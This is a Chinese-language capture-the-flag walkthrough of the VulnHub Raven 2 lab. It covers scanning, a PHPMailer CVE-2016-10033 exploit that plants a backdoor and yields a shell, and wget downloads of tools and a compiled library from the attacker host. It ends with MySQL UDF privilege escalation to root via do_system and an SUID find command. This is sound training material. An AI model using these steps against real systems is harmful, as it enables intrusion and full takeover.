3-VulnHub-Raven 2
VulnHub-Raven: 2
靶机地址:https://www.vulnhub.com/entry/raven-2,269/
目标:找到四个flag.txt信息
作者:尼德霍格007
时间:2021-7-8
准备工作:kali虚拟机(NAT),raven2虚拟机(NAT)
一、信息收集
首先要确定目标机IP地址,nmap扫描
$ nmap -sP 192.168.21.0/24
之后查看开放端口,全端口扫描
可以看到目标机开放了22端口(SSH),80端口(HTTP)和两个其他端口(我不知道是干嘛的)
先访问80端口
看见网页,翻一翻,没有思路。
扫一下目录
工具:dirb
dirb是一个轻量级的目录爆破工具,可以用它来快速的对目录进行一个简单的探测
dirb默认使用的爆破字典 /usr/share/dirb/wordlists/common.txt
命令:dirb http://192.168.21.133
开始爆破
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YuQSNBMe-1625752439300)(https://i.loli.net/2021/07/08/4JcuP38BaTbO6IV.png)]
看到有一个vendor目录
是个目录遍历
一个一个查看
在path中发现了第一个flag
而且得到网站绝对路径/var/www/html/vendor/
继续找,在README.md中看到这个靶机有一个PHPMailer服务
在VERSION中看到版本是5.2.16,推测是PHPMailer的版本
二、开始拿shell
百度这个版本相关漏洞
好家伙,直接搜出来一堆
使用searchsploit 搜索可以利用的漏洞
好像搜出来的都可以用
也可以到exploit-db.com搜索
跟着师傅们的路子走,选择40974这个
漏洞编号是CVE 2016-10033
将exp拷贝到当前目录
命令:cp /usr/share/exploitdb/exploits/php/webapps/40974.py .
这里要改一些40974.py的一些参数
头部要加上
#!/usr/bin/python
# -*- coding: utf-8 -*-
target要改成靶机的地址
backdoor就是后门文件,要和最后一个框里的名称对应
最后一个框的路径和名称要改一下,不能用默认的
执行
我这里报错了,安装一个requests_toolbelt模块即可解决
命令:
sudo apt-get install python3-pip
如果是python2的环境就把命令中的3去掉
执行
python3 40974.py
访问http://192.168.21.133/contact.php,他就会自动生成一个nide.php后门文件
开启监听(我这里由于8888端口监听不成功,就换成了4444)
然后访问后门文件
成功获得shell
继续用python获取pty
python -c ‘import pty;pty.spawn("/bin/bash")’
找了一番
成功获得第二个flag
查找一下,
得到两个flag,第二个我们看过了
查看第三个:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LrP5ULFq-1625752439315)(https://i.loli.net/2021/07/08/Wf92A7EhtJ8cZNu.png)]
最后一个flag需要提权
三、权限提升
我们去网站根目录下看看
有个wordpress,看一下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z1i5wlH2-1625752439316)(https://i.loli.net/2021/07/08/MnbAcvH5mwyqSxl.png)]
看一下配置文件
找到了数据库的root用户名和密码
用户名为:root
密码为:R@v3nSecurity
在这里利用Linux枚举漏洞工具LinEnum
下载地址:https://github.com/rebootuser/LinEnum
下载完,我们用python搭建以一个简易的服务器
命令:python -m SimpleHTTPServer 6666
把文件下载到靶机里面,给执行权限
wget http://192.168.21.128:6666/LinEnum.sh
没有错误提示说明上传成功
执行./LinEnum.sh
可以看到mysql是用root‘用户登陆的
使用命令:dpkg -l | grep mysqlmysql查看数据库版本是5.5.60
也可以连接数据库查看
mysql -u root -pR@v3nSecurity
select version();
百度找一下udf提权
查找可用的msf
使用第二个1518.c
拷贝出来
编译生成so文件
命令:gcc -g -c 1518.c
命令:gcc -g -shared -o nide.so 1518.o -lc
-g 生成调试信息
-c 编译(二进制)
-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。
-o:执行命令后的文件名
-lc:-l 库 c库名
使用前面的python 6666服务传输到靶机
wget http://192.168.21.128:6666/nide.so
然后通过mysql进行UDF提权
进入数据库
创建数据表 foo
create table foo(line blob);
插入数据:insert into foo values(load_file(’/tmp/nide.so’));
Foo表成功插入二进制数据
outfile 多行导出,dumpfile一行导出
outfile会有特殊的转换,而dumpfile是原数据导出
新建存储函数
然后利用dumpfile函数把文件导出
命令:select * from foo into dumpfile ‘/usr/lib/mysql/plugin/nide3.so’;
创建自定义函数do_system 类型是integer,别名(soname)文件名字
命令:create function do_system returns integer soname ‘nide3.so’;
然后查询函数是否创建成功
命令:select * from mysql.func
调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令
任意创建一个文件
执行find命令
使用find执行 shell
命令:find finn -exec “/bin/sh” ;
成功获得root权限!!
终于拿下这台靶机
获得flag4
四、总结
这次复现的难度挺大的,官方说是中等难度,但是我一路打下来比昨天打的Lampiao难多了,中间遇到的问题层出不穷。首先是在利用CVE 2016-10033漏洞时,改payload文件时就弄错了好久,之后在利用Linux枚举漏洞提权时,因为不熟悉数据库的相关操作,今天下午一直卡在这里,经历了重启虚拟机,重建数据表,重新添加一台虚拟机等多种方法后,终于在最后成功在数据库建立表,创建自定义函数,导出数据,提权,获得flag4。真的挺不容易的,再接再厉吧!